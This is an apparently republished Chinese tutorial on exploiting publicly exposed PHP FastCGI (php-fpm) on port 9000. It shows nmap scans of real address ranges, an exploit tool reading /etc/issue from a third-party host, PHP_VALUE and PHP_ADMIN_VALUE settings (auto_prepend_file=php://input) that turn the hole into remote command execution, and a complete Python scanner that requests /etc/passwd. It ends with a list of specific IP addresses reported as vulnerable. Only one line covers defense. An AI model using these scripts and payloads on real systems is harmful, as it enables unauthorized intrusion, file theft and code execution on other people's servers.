fastcgi檔案讀取漏洞之python掃描腳本的實例解析

這篇文章主要介紹了fastcgi檔案讀取漏洞之python掃描腳本,需要的朋友可以參考下

#PHP FastCGI的遠端利用

說到FastCGI，大家都知道這是目前最常見的webserver動態腳本執行模型之一。目前基本所有web腳本都基本上支援這種模式，甚至有的類型腳本這是唯一的模式（ROR，Python等）。

FastCGI的主要目的就是，將webserver和動態語言的執行分開為兩個不同的常駐進程，當webserver接收到動態腳本的請求，就透過fcgi協定將請求透過網路轉送給fcgi進程，由fcgi進程進行處理之後，再將結果傳送給webserver，然後webserver再輸出給瀏覽器。這種模型由於不用每次請求都重新啟動一次cgi，也不用嵌入腳本解析器到webserver中去，因此可伸縮性很強，一旦動態腳本請求量增加，就可以將後端fcgi進程單獨設立一個集群提供服務，很大的增加了可維護性，這也是為什麼fcgi等類似模式如此流行的原因之一。

然而正是因為這種模式，卻也帶來了一些問題。例如去年80sec發布的《nginx檔案解析漏洞》 其實就是由於fcgi和webserver對script路徑級參數的理解不同出現的問題。除此之外，由於fcgi和webserver是透過網路進行溝通的，因此目前越來越多的叢集將fcgi直接綁定在公網上，所有人都可以對其進行存取。這樣就意味著，任何人都可以偽裝成webserver，讓fcgi執行我們想執行的腳本內容。

ok，以上就是背景原理解釋，我在這裡就用我最熟悉的PHP給各位做個例子。

php的fastcgi目前通常叫做FPM。他預設監聽的連接埠是9000埠。我們這裡用nmap直接掃描一下：

nmap -sV -p 9000 --open x.x.x.x/24

為什麼要用sV？因為9000埠可能還有其他服務，這裡需要藉用nmap的指紋辨識先幫我們鑑定一下。

[root@test:~/work/fcgi]#nmap -sV -p 9000 --open 173.xxx.xxx.1/24
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDTNmap scan report for abc.net (173.xxx.xxx.111)Host is up (0.0095s latency).PORT     STATE SERVICE VERSION9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Nmap scan report for abc.com (173.xxx.xxx.183)Host is up (0.0096s latency).PORT     STATE SERVICE    VERSION9000/tcp open  tcpwrapped
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

隨便掃描了一下，運氣不錯，一個C段有2個開放9000埠的，不過其中一個是被管理員修改的sshd，另一個tcpwrapped，才是我們的目標。

為了做測試，我寫了一個fastcgi的客戶端程序，直接向對方發起請求。我們利用一個開放的fastcgi能有什麼作用？這裡和普通的http請求有一點不同，因為webserver為了提供fastcgi一些參數，每次轉送請求的時候，會透過FASTCGI_PARAMS的封包向fcgi進程傳遞。本來這些參數是使用者不可控的，但是既然這個fcgi對外開放，那麼也就說明我們可以透過設定這些參數，來讓我們去做一些原本做不到的事情：

[root@test:~/work/fcgi]#./fcgi_exp read 173.xxx.xxx.183 9000 /etc/issue
X-Powered-By: PHP/5.3.2-1ubuntu4.9Content-type: text/html www.jb51.net
Ubuntu 10.04.3 LTS \n \l

#讀了/etc/issue文件，可以看到這是一台ubuntu 10.04的機器。那又是怎麼實現的呢？其實我們只要在FASTCGI_PARAMS中，設定 DOCUMENT_ROOT為"/"根目錄即可，接著再設定SCRIPT_FILENAME為/etc/issue。這樣，只要我們有權限，我們就可以控制fcgi去讀取這台機器上的任意檔案了。實際上這不是讀取，而是用php去執行它。

既然是執行，所以其實這個漏洞就類似一個普通的LFI漏洞，如果你知道這台機器上的log路徑，或是任何你可以控制內容的檔案路徑，你就可以執行任意程式碼了。

到此為止了麼？不，如果利用log或去猜其他檔案路徑去執行程式碼，還是不夠方便，有沒有更方便的利用方式可以讓我執行任意我提交的程式碼呢？

這裡我也找了很多辦法，最先想到的是傳遞env參數過去然後去執行/proc/self/environ文件，可惜php-fpm在接收到我的參數值後只是在內存中修改了環境變量，並不會直接改動這個檔案。因此沒辦法利用。況且這個方式也不是所有系統都通用。

我們還有一個方法，在我之前寫的《CVE-2012-1823（PHP-CGI RCE）的PoC及技術挑戰》中，可以透過動態修改php.ini中的auto_prepend_file的值，去遠端執行任意文件。將一個LFI的漏洞變成了RFI，這樣可利用空間就大大增加。

fastcgi是否也支援類似的動態修改php的配置？我查了一下資料，發現原本FPM是不支援的，直到某位開發者提交了一個bug，php官方才將此特性Merge到php 5.3.3的源碼中去。

通用透過設定FASTCGI_PARAMS，我們可以利用PHP_ADMIN_VALUE和PHP_VALUE去動態修改php的設定。

env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "auto_prepend_file = php://input"
env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ ndisable_functions = \nsafe_mode = Off"

利用執行php://input，然後在POST的內容中寫入我們的php程式碼，這樣就可以直接執行了。

[root@test:~/work/fcgi]#./fcgi_exp system 127.0.0.1 9000 /tmp/a.php "id; uname -a"   
X-Powered-By: PHP/5.5.0-devContent-type: text/html
uid=500(www) gid=500(www) groups=500(www)Linux test 2.6.18-308.13.1.el5 #1 SMP Tue Aug 21 17:51:21 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux

细心者会注意到这里有些变化，我换了本机做测试。因为开始发现的那台机器php版本是5.3.2，正好低于5.3.3，因此无法利用修改ini设置去执行代码，只能去猜路径。

另一个变化是，我这里去读取/tmp/a.php这个php文件，而不是去读取/etc/issue。因为在5.3.9开始，php官方加入了一个配置"security.limit_extensions"，默认状态下只允许执行扩展名为".php"的文件。因此你必须找到一个已经存在的php文件。而这个设置是php-fpm.conf里的，无法通过修改ini的配置去覆盖它。如果谁能有更好的办法可以绕过这个限制，请告诉我。

ok，目前为止对php-fpm的所有测试已经结束，我们利用一个对外开放的fcgi进程，已经可以直接获取shell了。各位不如也去研究一下其他fcgi，或许会有更多发现。

如何防止这个漏洞？很简单，千万不要把fcgi接口对公网暴露。同时也希望将来fcgi会有身份认证机制。

任何系统上编译，请安装golang之后，执行：
go build fcgi_exp.go

fastcgi文件读取漏洞python扫描脚本

fastcgi文件读取（代码执行）是个很老的漏洞，漏洞描述： PHP FastCGI 的远程利用

利用该漏洞可读取系统文件，甚至有一定几率成功执行代码。 下载上述文章中提到的： fcgi_exp

协议细节其实我已不关心，只需要一个python的扫描脚本。于是拿wireshark抓了下GaRY的程序，写一小段代码。

外网暴露9000端口的机器自然是非常非常少的，但内网可就说不定了。

import socket
import sys
def test_fastcgi(ip):
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
  sock.connect((ip, 9000))
  data = """
  01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
  01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 
  54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 
  56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 
  2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
  4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
  52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 
  50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 
  70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
  4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
  63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
  """
  data_s = ''
  for _ in data.split():
    data_s += chr(int(_,16))
  sock.send(data_s)
  try:
    ret = sock.recv(1024)
    if ret.find(':root:') > 0:
      print ret
      print '%s is vulnerable!' % ip
      return True
    else:
      return False
  except Exception, e:
    pass
      
  sock.close()
if __name__ == '__main__':
  if len(sys.argv) == 1:
    print sys.argv[0], '[ip]'
  else:
    test_fastcgi(sys.argv[1])

通过快速扫描9000端口，可以发现几个存在漏洞的机器：

110.164.68.137 is vul !
110.164.68.148 is vul !
110.164.68.149 is vul !
110.164.68.151 is vul !
110.164.68.154 is vul !
110.164.68.155 is vul !

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd

以上是fastcgi檔案讀取漏洞之python掃描腳本的實例解析的詳細內容。更多資訊請關注PHP中文網其他相關文章！